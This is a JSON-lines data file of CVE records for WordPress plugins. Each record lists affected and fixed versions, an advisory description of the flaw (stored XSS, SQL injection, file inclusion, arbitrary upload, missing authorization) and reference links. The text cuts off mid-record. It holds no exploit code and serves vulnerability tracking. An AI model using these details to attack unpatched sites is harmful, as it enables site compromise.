{"CVE_ID":"CVE-2025-4431","slug":"featured-image-plus","versionImpact":"1.6.4","versionEndExcluding":"1.6.6","description":"The Featured Image Plus \u2013 Quick & Bulk Edit with Unsplash plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fip_save_attach_featured function in all versions up to, and including, 1.6.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update featured image of any post.","recommendation":"Update to version 1.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-plus\\\/trunk\\\/inc\\\/admin\\\/block-editor\\\/block-editor-actions.php#L204\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-plus\\\/trunk\\\/inc\\\/admin\\\/block-editor\\\/block-editor-actions.php#L204\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/209341fa-6761-4bc4-a921-afa98495a087?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/209341fa-6761-4bc4-a921-afa98495a087?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4411","slug":"mihdan-yandex-turbo-feed","versionImpact":"1.6.5.1","versionEndExcluding":"1.6.6","description":"The Mihdan: Yandex Turbo Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.6.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ecf99ef-f879-426f-8a05-129be77f1157?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ecf99ef-f879-426f-8a05-129be77f1157?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3081039%40mihdan-yandex-turbo-feed%2Ftrunk&old=3005548%40mihdan-yandex-turbo-feed%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3081039%40mihdan-yandex-turbo-feed%2Ftrunk&old=3005548%40mihdan-yandex-turbo-feed%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5004","slug":"cm-pop-up-banners","versionImpact":"1.6.5","versionEndExcluding":"1.6.6","description":"The CM Popup Plugin for WordPress plugin before 1.6.6 does not sanitise and escape some of the campaign settings, which could allow authenticated users such as contributors to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4bea7baa-84a2-4b21-881c-4f17822329e7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4bea7baa-84a2-4b21-881c-4f17822329e7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1945","slug":"arforms-form-builder","versionImpact":"1.6.4","versionEndExcluding":"1.6.5","description":"The Contact Form, Survey & Popup Form Plugin for WordPress \u2013  ARForms Form Builder plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'arflite_remove_preview_data' function in all versions up to, and including, 1.6.4. This makes it possible for authenticated attackers, with subscriber access and above, to delete arbitrary site options, resulting in loss of availability.","recommendation":"Update to version 1.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/026f8d9b-a66b-4a59-8375-fba587a4eef7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/026f8d9b-a66b-4a59-8375-fba587a4eef7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arforms-form-builder\\\/tags\\\/1.6.3\\\/core\\\/controllers\\\/arfliteformcontroller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arforms-form-builder\\\/tags\\\/1.6.3\\\/core\\\/controllers\\\/arfliteformcontroller.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3130","slug":"shorten-url","versionEndExcluding":"1.6.5","description":"The Short URL WordPress plugin before 1.6.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e167864-c304-402e-8b2d-d47b5a3767d1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e167864-c304-402e-8b2d-d47b5a3767d1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6262","slug":"portfolio-filter-gallery","versionImpact":"1.6.4","versionEndExcluding":"1.6.5","description":"The Portfolio Gallery \u2013 Image Gallery Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'PFG' shortcode in all versions up to, and including, 1.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adf6b34b-a362-4cfe-b062-8bbe11584581?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adf6b34b-a362-4cfe-b062-8bbe11584581?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-filter-gallery\\\/trunk\\\/lightbox\\\/ld-lightbox\\\/js\\\/lightbox.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-filter-gallery\\\/trunk\\\/lightbox\\\/ld-lightbox\\\/js\\\/lightbox.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107963\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107963\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3435","slug":"user-activity-log","versionEndExcluding":"1.6.5","description":"The User Activity Log WordPress plugin before 1.6.5 does not correctly sanitise and escape several parameters before using them in a SQL statement as part of its export feature, allowing unauthenticated attackers to conduct SQL injection attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30a37a61-0d16-46f7-b9d8-721d983afc6b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30a37a61-0d16-46f7-b9d8-721d983afc6b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34826","slug":"cf7-styler","versionImpact":"1.6.4","versionEndExcluding":"1.6.5","description":"Missing Authorization vulnerability in Tobias Conrad Design for Contact Form 7 Style WordPress Plugin \u2013 CF7 WOW Styler. This issue affects Design for Contact Form 7 Style WordPress Plugin \u2013 CF7 WOW Styler: from n\/a through 1.6.4.","recommendation":"Update to version 1.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/cf7-styler\\\/wordpress-cf7-wow-styler-plugin-1-6-4-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/cf7-styler\\\/wordpress-cf7-wow-styler-plugin-1-6-4-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13353","slug":"responsive-addons-for-elementor","versionImpact":"1.6.4","versionEndExcluding":"1.6.5","description":"The Responsive Addons for Elementor \u2013 Free Elementor Addons Plugin and Elementor Templates plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.6.4 via several widgets. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-product-carousel.php#L3151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-product-carousel.php#L3151\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-woo-products.php#L3725\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-woo-products.php#L3725\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226779\\\/responsive-addons-for-elementor\\\/tags\\\/1.6.5\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-product-carousel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226779\\\/responsive-addons-for-elementor\\\/tags\\\/1.6.5\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-product-carousel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226779\\\/responsive-addons-for-elementor\\\/tags\\\/1.6.5\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-woo-products.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226779\\\/responsive-addons-for-elementor\\\/tags\\\/1.6.5\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-woo-products.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98df88f8-5aeb-4f57-8525-6a9357173b1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98df88f8-5aeb-4f57-8525-6a9357173b1d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13354","slug":"responsive-addons-for-elementor","versionImpact":"1.6.4","versionEndExcluding":"1.6.5","description":"The Responsive Addons for Elementor \u2013 Free Elementor Addons Plugin and Elementor Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via HTML tags in several widgets in all versions up to, and including, 1.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226779%40responsive-addons-for-elementor&new=3226779%40responsive-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226779%40responsive-addons-for-elementor&new=3226779%40responsive-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c46d71fb-ccf1-4cbe-8088-edb7fba225e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c46d71fb-ccf1-4cbe-8088-edb7fba225e9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11230","slug":"header-footer-elementor","versionImpact":"1.6.46","versionEndExcluding":"1.6.47","description":"The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018size\u2019 parameter in all versions up to, and including, 1.6.46 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.47, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.46\\\/inc\\\/widgets-manager\\\/widgets\\\/class-page-title.php#L516\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.46\\\/inc\\\/widgets-manager\\\/widgets\\\/class-page-title.php#L516\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194764\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194764\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d82c866-5b35-414e-bd72-30530930d5d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d82c866-5b35-414e-bd72-30530930d5d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10050","slug":"header-footer-elementor","versionImpact":"1.6.43","versionEndExcluding":"1.6.44","description":"The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Information Disclosure in all versions up to, and including, 1.6.43 via the hfe_template shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to view the contents of Draft, Private and Password-protected posts they do not own.","recommendation":"Update to version 1.6.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/662f6ae2-2047-4bbf-b4a6-2d536051e389?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/662f6ae2-2047-4bbf-b4a6-2d536051e389?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.43\\\/inc\\\/class-header-footer-elementor.php#L634\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.43\\\/inc\\\/class-header-footer-elementor.php#L634\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173344\\\/header-footer-elementor\\\/trunk\\\/inc\\\/class-header-footer-elementor.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173344\\\/header-footer-elementor\\\/trunk\\\/inc\\\/class-header-footer-elementor.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13833","slug":"new-album-gallery","versionImpact":"1.6.3","versionEndExcluding":"1.6.4","description":"The Album Gallery \u2013 WordPress Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.6.3 via deserialization of untrusted input from gallery meta. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 1.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246291\\\/new-album-gallery\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246291\\\/new-album-gallery\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc7075a6-5609-42ab-a4cb-9d33686c7de0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc7075a6-5609-42ab-a4cb-9d33686c7de0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0664","slug":"meks-smart-social-widget","versionEndExcluding":"1.6.4","description":"The Meks Smart Social Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Meks Smart Social Widget in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/722aae99-fcfb-4234-9245-5db57aaa03c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/722aae99-fcfb-4234-9245-5db57aaa03c5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027347%40meks-smart-social-widget&new=3027347%40meks-smart-social-widget&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027347%40meks-smart-social-widget&new=3027347%40meks-smart-social-widget&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11765","slug":"gs-portfolio","versionImpact":"1.6.3","versionEndExcluding":"1.6.4","description":"The WordPress Portfolio Plugin \u2013 A Plugin for Making Filterable Portfolio Grid, Portfolio Slider and more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gs_portfolio' shortcode in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-portfolio\\\/tags\\\/1.6.3\\\/gsportfolio-files\\\/includes\\\/templates\\\/gs_portfolio_sthree_kira.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-portfolio\\\/tags\\\/1.6.3\\\/gsportfolio-files\\\/includes\\\/templates\\\/gs_portfolio_sthree_kira.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204631%40gs-portfolio&new=3204631%40gs-portfolio&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204631%40gs-portfolio&new=3204631%40gs-portfolio&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e78440d-54ab-400f-a8d2-9cb33f1ec861?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e78440d-54ab-400f-a8d2-9cb33f1ec861?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13392","slug":"rate-star-review","versionImpact":"1.6.3","versionEndExcluding":"1.6.4","description":"The Rate Star Review Vote \u2013 AJAX Reviews, Votes, Star Ratings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_reviews' shortcode in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224268%40rate-star-review&new=3224268%40rate-star-review&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224268%40rate-star-review&new=3224268%40rate-star-review&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb5a85ba-9545-4d64-ac7c-6b856e4ab354?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb5a85ba-9545-4d64-ac7c-6b856e4ab354?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36735","slug":"erp","versionEndExcluding":"1.6.4","description":"The WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.3. This is due to missing or incorrect nonce validation on the handle_leave_calendar_filter, add_enable_disable_option_save, leave_policies, process_bulk_action, and process_crm_contact functions. This makes it possible for unauthenticated attackers to modify the plugins settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01b90498-0ddb-4eb3-b76d-de30ed03d7d0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01b90498-0ddb-4eb3-b76d-de30ed03d7d0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368462%40erp&new=2368462%40erp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368462%40erp&new=2368462%40erp&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4703","slug":"one-page-express-companion","versionImpact":"1.6.37","versionEndExcluding":"1.6.38","description":"The One Page Express Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's one_page_express_contact_form shortcode in all versions up to, and including, 1.6.37 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.38, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a00a5c41-b211-45e4-acf8-01fd8e64b1c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a00a5c41-b211-45e4-acf8-01fd8e64b1c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097699\\\/one-page-express-companion\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097699\\\/one-page-express-companion\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3410","slug":"dn-footer-contacts","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The DN Footer Contacts WordPress plugin before 1.6.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2067637-45f3-4b42-96ca-85867c4c0409\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2067637-45f3-4b42-96ca-85867c4c0409\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9212","slug":"sku-for-woocommerce","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The SKU Generator for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sku-for-woocommerce\\\/tags\\\/1.6.2\\\/includes\\\/settings\\\/class-wc-sku-tools-regenerator.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sku-for-woocommerce\\\/tags\\\/1.6.2\\\/includes\\\/settings\\\/class-wc-sku-tools-regenerator.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f59ccb78-722b-490b-874e-7026afc3511b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f59ccb78-722b-490b-874e-7026afc3511b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10547","slug":"wp-membership","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The WP Membership plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the user_profile_image_upload() function in all versions up to, and including, 1.6.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.6.3, or a newer patched 